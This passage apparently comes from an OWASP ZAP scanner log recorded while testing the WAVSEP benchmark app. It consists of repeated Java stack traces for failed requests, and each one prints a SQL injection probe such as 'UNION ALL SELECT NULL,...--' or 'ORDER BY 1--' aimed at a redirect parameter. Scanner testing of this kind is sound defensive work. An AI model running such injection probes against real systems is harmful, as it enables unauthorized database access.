org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681829 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681829 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681831 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681831 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681832 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681832 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681833 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681833 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681834 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681835 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681835 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681837 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681837 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at 